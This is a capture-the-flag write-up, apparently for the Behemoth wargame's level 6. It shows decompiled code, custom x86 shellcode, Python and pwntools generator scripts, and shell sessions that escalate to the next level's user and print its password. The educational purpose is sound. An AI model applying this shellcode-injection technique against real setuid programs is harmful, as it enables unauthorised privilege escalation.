Behemoth6
Recordamos deshabilitar ASLR con:
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
__libc_start_main(0x80485db, 1, 0xffffd774, 0x80486d0 <unfinished ...>
popen("/behemoth/behemoth6_reader", "r") = 0x804b008
malloc(10) = 0x804b0b8
fread(0x804b0b8, 10, 1, 0x804b008) = 1
--- SIGCHLD (Child exited) ---
pclose(0x804b008) = 0
strcmp("Couldn't o", "HelloKitty") = -1
puts("Incorrect output."Incorrect output.
) = 18
+++ exited (status 0) +++
undefined4 main(undefined1 param_1) {
FILE *__stream;
char *__s1;
int iVar1;
__uid_t __euid;
__uid_t __ruid;
__stream = popen("/behemoth/behemoth6_reader","r");
if (__stream == (FILE *)0x0) {
puts("Failed to create pipe.");
/* WARNING: Subroutine does not return */
exit(0);
}
__s1 = (char *)malloc(10);
fread(__s1,10,1,__stream);
pclose(__stream);
iVar1 = strcmp(__s1,"HelloKitty");
if (iVar1 == 0) {
puts("Correct.");
__euid = geteuid();
__ruid = geteuid();
setreuid(__ruid,__euid);
execl("/bin/sh","sh",0);
}
else {
puts("Incorrect output.");
}
return 0;
}
undefined4 main(undefined1 param_1) {
FILE *__stream;
size_t __size;
code *__ptr;
int local_14;
__stream = fopen("shellcode.txt","r");
if (__stream == (FILE *)0x0) {
puts("Couldn\'t open shellcode.txt!");
}
else {
fseek(__stream,0,2);
__size = ftell(__stream);
rewind(__stream);
__ptr = (code *)malloc(__size);
fread(__ptr,__size,1,__stream);
fclose(__stream);
local_14 = 0;
while (local_14 < (int)__size) {
if (__ptr[local_14] == (code)0xb) {
puts("Write your own shellcode.");
/* WARNING: Subroutine does not return */
exit(1);
}
local_14 = local_14 + 1;
}
(*__ptr)();
}
return 0;
}
int main() {
char str[11] = "HelloKitty\0";
puts(str);
return (0);
}
push 0x00007974
push 0x74694B6f
push 0x6c6c6548
mov ebx, 0x1
mov ecx, esp
mov edx, 0xc
mov eax, 0x4
int 0x80
mov eax, 1
mov ebx, 0
int 0x80
https://defuse.ca/online-x86-assembler.htm#disassembly
\x68\x74\x79\x00\x00\x68\x6F\x4B\x69\x74\x68\x48\x65\x6C\x6C\xBB\x01\x00\x00\x00\x89\xE1\xBA\x0C\x00\x00\x00\xB8\x04\x00\x00\x00\xCD\x80\xB8\x01\x00\x00\x00\xBB\x00\x00\x00\x00\xCD\x80
import sys
PAYLOAD = "\x68\x74\x79\x00\x00\x68\x6F\x4B\x69\x74\x68\x48\x65\x6C\x6C\xBB\x01\x00\x00\x00\x89\xE1\xBA\x0C\x00\x00\x00\xB8\x04\x00\x00\x00\xCD\x80\xB8\x01\x00\x00\x00\xBB\x00\x00\x00\x00\xCD\x80"
f = open("shellcode.txt","w")
f.write(PAYLOAD)
f.close()
behemoth6@behemoth:/tmp/Marmeus$ python E6.py; /behemoth/behemoth6_reader; /behemoth/behemoth6
HelloKittyCorrect.
$ cat /etc/behemoth_pass/behemoth/behemoth7
cat: /etc/behemoth_pass/behemoth/behemoth7: No such file or directory
$ id
uid=13007(behemoth7) gid=13006(behemoth6) groups=13006(behemoth6)
from pwn import *
output = open('shellcode.txt', 'w')
shellcode = """
push 0x00007974
push 0x74694B6f
push 0x6c6c6548
mov eax, 0x4
mov ebx, 0x1
mov ecx, esp
mov edx, 0xc
int 0x80
mov eax, 1
mov ebx, 0
int 0x80
"""
output.write(asm(shellcode))
output.close()
behemoth6@behemoth:/tmp/x4v1tmp$ cat <<EOF>> shell_gen.py
> from pwn import *
>
> output = open('shellcode.txt', 'w')
>
> shellcode = """
> push 0x00007974
> push 0x74694B6f
> push 0x6c6c6548
>
> mov eax, 0x4
> mov ebx, 0x1
>
> mov ecx, esp
> mov edx, 0xc
>
> int 0x80
> mov eax, 1
> mov ebx, 0
> int 0x80
> """
>
> output.write(asm(shellcode))
> output.close()
> EOF
behemoth6@behemoth:/tmp/x4v1tmp$ python shell_gen.py
behemoth6@behemoth:/tmp/x4v1tmp$ /behemoth/behemoth6
Correct.
$ id
uid=13007(behemoth7) gid=13006(behemoth6) groups=13006(behemoth6)
$ cat /etc/behemoth_pass/behemoth7
baquoxuafo
$